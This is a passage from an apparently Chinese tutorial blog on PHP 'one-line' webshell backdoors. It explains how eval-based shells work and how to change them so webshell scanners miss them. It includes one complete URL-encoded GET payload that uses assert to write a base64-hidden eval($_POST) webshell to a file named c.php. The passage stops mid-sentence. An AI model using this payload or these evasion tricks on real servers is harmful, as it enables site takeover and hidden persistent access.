php7 一句话木马,PHP一句话木马后门

在我们进行渗透测试的最后阶段，入侵到内网里，无论是想要浏览网站结构，还是抓取数据库，或者是挂个木马等等，到最后最常用的就是执行一句话木马，从客户端轻松连接服务器。

一句话木马的原理很简单，造型也很简单，所以造成了它理解起来容易，抵御起来也容易。于是黑白的较量变成了黑帽不断的构造变形的后门，去隐蔽特征，而白帽则不断的更新过滤方法，建起更高的城墙。

一、原理简述

对于不同的语言有不同的构造方法。

基本构造：最开头构造的是脚本开始的标记

核心部分：获取并执行得到的内容，通常类似eval、execute等

被执行内容：一般是http等协议接受的值，通常类似request、$_POST等

如果我们通过客户端向服务器发送被执行内容，那么就会让服务器执行我们发送的脚本，挂马就实现了。

/*asp一句话木马*/

/*php一句话木马*/

/*aspx一句话木马*/

黑帽子的目的，就是想尽办法给目标网站插入这么一段会被储存起来的语句。可以是一个单独的脚本文件文件(.asp 、.php、.aspx )，或者是隐藏在某些网页下的文件、代码等。其中的value 就是客户端要发送的内容，然后通过客户端与服务器建立连接，发送控制脚本。也会涉及到一些任意文件上传漏洞等。

二、简单变形

很明显的 eval 可以成为一个静态特征码，webshell扫描工具可以以此为关键词，扫描到这种木马加以屏蔽。于是可以简单变形不出现eval：

同理，传给a值为 @base64_decode(base64编码过后的eval)。

利用方法：

?a=assert&b=${fputs%28fopen%28base64_decode%28Yy5waHA%29,w%29,base64_decode%28PD9waHAgQGV2YWwoJF9QT1NUW2NdKTsgPz4x%29%29};

通过对GET请求的URL构造而形成利用，左括号和右括号是URL编码，解码回来如下：

?a=assert&b=${fputs(fopen(base64_decode(Yy5waHA),w),base64_decode(PD9waHAgQGV2YWwoJF9QT1NUW2NdKTsgPz4x))};

PHP接收到GET请求后相当于执行一个assert函数，并把b作为assert的参数。b里